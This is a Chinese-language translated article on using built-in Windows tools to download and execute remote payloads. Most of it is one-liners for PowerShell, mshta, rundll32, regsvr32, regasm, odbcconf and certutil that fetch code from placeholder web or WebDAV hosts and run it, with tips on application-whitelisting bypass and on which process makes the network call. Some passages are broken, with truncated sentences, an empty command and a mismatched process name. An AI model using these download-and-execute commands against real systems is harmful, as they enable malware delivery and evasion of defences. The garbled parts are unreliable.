近期,
首先,这些命令行工具需要满足以下条件:
1.允许执行任意代码;
2.支持从远程服务器下载Payload;
3.支持代理;
4.支持尽可能多的Microsoft标准(或使用广泛的)代码库;
5.只会在内存中执行,而不会在磁盘中留下痕迹;
实际上,前人已经在这个领域做出了很多的努力。尤其是@subTee,他不仅设计出了应用程序白名单绕过技术,而且他还发明了使用Microsoft内置代码库来执行任意代码的方法。
需要注意的是,并非所有的命令行工具都满足上述所有的条件,尤其是上面的第五点,因为在绝大多数情况下,工具都会在目标系统的本地磁盘中
如果考虑到需要从远程服务器
1. 命令本身可以接受一个HTTP URL作为其中一个参数;
2. 命令接受一个UNC路径(指向一台WebDAV服务器);
3. 命令能够执行一个小型的内联脚本(脚本负责完成下载任务);
根据Windows系统版本的不同(Win 7或Win 10),系统会将那些通过HTTP下载的对象存储在不同的IE本地缓存之中:
C:\Users\\AppData\Local\Microsoft\Windows\TemporaryInternet Files\
C:\Users\\AppData\Local\Microsoft\Windows\INetCache\IE\
而通过UNC路径(指向一台WebDAV服务器)访问的文件将会被存储在WebDAV客户端本地缓存之中:
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
在使用UNC路径指向一台托管了Payload的WebDAV服务器时,请记住一点:只有当WebClient服务开启之后该功能才能正常工作。假设该服务没有开启,那么如果你想使用低权限用户角色来开启该服务的话,可以直接在命令行界面中使用命令“pushd \\webdavserver & popd”。
在下面给出的场景中,我们将会给大家介绍几种热门命令行工具的使用以及注意事项。
PowerShell
毫无疑问,Powershell绝对是目前最著名的命令行工具了,但同时它也受监控最多的一个了。下面给出的是一种代理友好型命令:
powershell -exec bypass -c"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
在这条命令中,负责执行网络调用的是powershell.exe,而且不会在本地磁盘中写入Payload。
当然了,你也可以对命令进行部分编码。除此之外,你还可以直接从一台WebDAV服务器来调用Payload:
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
在上面这条命令中,负责执行网络调用的是svchost.exe,而命令会将下载的Payload文件写入到WebDAV客户端本地缓存之中。
Cmd
当你想使用cmd.exe运行一个批处理文件时,为什么情况会变得很复杂呢?尤其是当你的批处理文件不仅会执行一系列命令,而且还嵌入了任意类型文件的时候。大家可以参考一下我自己开发的Invoke-EmbedInBatch.ps1脚本(受到了@xorrior的启发),它可以帮助你轻松地在目标主机中释放任何代码、dll、以及脚本:
https://github.com/Arno0x/PowerShellScripts
命令如下:
cmd.exe /k
在上述命令中,负责执行网络调用的是svchost.exe,而命令会将下载的Payload文件写入到WebDAV客户端本地缓存之中。
Cscript/Wscript
这两种命令行工具也是很常见的,我们可以使用一行命令来从一台远程服务器中下载Payload:
cscript //E:jscript\\webdavserver\folder\payload.txt
在上述命令中,负责执行网络调用的是svchost.exe,而命令会将下载的Payload文件写入到WebDAV客户端本地缓存之中。
Mshta
实际上,Mshta跟cscript/wscript是一类的,但是它还可以执行内联脚本,我们可以通过内联脚本来下载并执行Payload代码:
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
在上述命令中,负责执行网络调用的是mshta.exe,而命令会将下载的Payload文件写入到IE本地缓存之中。
由于mshta还可以接受URL地址作为参数并执行HTA文件,因此我们还可以使用下面这种小技巧来执行命令:
mshta http://webserver/payload.hta
其中,负责执行网络调用的是mshta.exe,而命令会将下载的Payload文件写入到IE本地缓存之中。
除此之外,下面的命令还可以隐藏mshta.exe所下载的内容:
mshta \\webdavserver\folder\payload.hta
其中,负责执行网络调用的是svchost.exe,而命令会将下载的Payload文件写入到WebDAV客户端本地缓存之中。
Rundll32
Rundll32也非常出名,它的使用方式非常多样化。首先,我们可以使用UNC路径来引用一个标准的DLL文件:
rundll32 \\webdavserver\folder\payload.dll,entrypoint
在上述命令中,负责执行网络调用的是mshta.exe,而命令会将下载的Payload文件写入到IE本地缓存之中。
Rundll32还可以用来调用某些内联脚本:
rundll32.exejavascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
其中,负责执行网络调用的是rundll32.exe,而命令会将下载的Payload文件写入到IE本地缓存之中。
Regasm/Regsvc
Regasm和Regsvc是@subTee发明的其中一种应用程序白名单绕过技术,你需要创建一个特殊的DLL(可使用.Net或C#编写)来获取相应接口,然后通过WebDAV来调用这个文件:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe/u \\webdavserver\folder\payload.dll
其中,负责执行网络调用的是svchost.exe,而命令会将下载的Payload文件写入到WebDAV客户端本地缓存之中。
Regsvr32
这种技术也是@subTee发明的,它需要的脚本跟mshta所使用的有些许不同。首选方法如下:
regsvr32 /u /n /s/i:http://webserver/payload.sct scrobj.dll
负责执行网络调用的是regsvr32.exe,而命令会将下载的Payload文件写入到IE本地缓存之中。
其次,我们还可以使用UNC/WebDAV:
regsvr32 /u /n /s/i:\\webdavserver\folder\payload.sct scrobj.dll
其中,负责执行网络调用的是svchost.exe,而命令会将下载的Payload文件写入到WebDAV客户端本地缓存之中。
Odbcconf
Odbcconf跟regsvr32有些类似,它同样是@subTee发明的。它能够执行包含特殊功能的DLL,需要注意的是,这种DLL文件不需要使用.dll后缀,而且可以通过UNC/WebDAV下载:
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
其中,负责执行网络调用的是svchost.exe,而命令会将下载的Payload文件写入到WebDAV客户端本地缓存之中。
命令结合
实际上,我们可以根据自己的需要来同时运行多条命令。
比如说,整个Payload下载部分我们都可以通过certutil.exe来完成:
certutil -urlcache -split -fhttp://webserver/payload payload
除此之外,我们还可以用certutil.exe配合InstallUtil.exe来执行特殊的DLL:
certutil -urlcache -split -fhttp://webserver/payload.b64 payload.b64 & certutil -decode payload.b64payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil/logfile= /LogToConsole=false /u payload.dll
当然了,你也可以直接传递一个可执行文件:
certutil -urlcache -split -fhttp://webserver/payload.b64 payload.b64 & certutil -decode payload.b64payload.exe & payload.exe
Payload样本
你可以从atomic-red-team的GitHub代码库中获取可用的Payload样本:
除此之外,你也可以从GreatSCT项目的GitHub中获取自动生成的Payload:
当然了,我自己的Gist【传送门】中也托管了不少的Payload样本,感兴趣的同学可以参考一下。
* 参考来源:arno0x0x,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM